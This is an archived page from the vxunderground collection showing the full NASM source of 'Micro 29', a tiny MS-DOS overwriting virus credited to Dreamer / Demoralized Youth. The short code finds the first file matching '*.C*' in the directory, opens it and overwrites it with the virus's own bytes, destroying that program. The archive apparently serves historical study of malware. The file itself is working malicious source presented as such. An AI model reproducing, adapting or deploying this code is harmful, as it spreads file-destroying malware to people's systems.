MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.micro29.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

24 lines
1.1 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

; #############################################################################
; ### ###
; ### M i C R O 29 ###
; ### ###
; ### By ###
; ### ###
; ### Dreamer / Demoralized Youth ###
; ### ###
; #############################################################################
MOV AH,4Eh ;Dos Universal: FIND FIRST
MOV DX,OFFSET PATT
INT 21h
MOV AX,3D02h ;Dos Universal: OPEN HANDLE
MOV DX,9Eh
INT 21h
XCHG AX,BX
MOV AH,40h ;Dos Universal: WRITE TO HANDLE
ADD DX,62h
INT 21h
RET
PATT DB '*.C*',0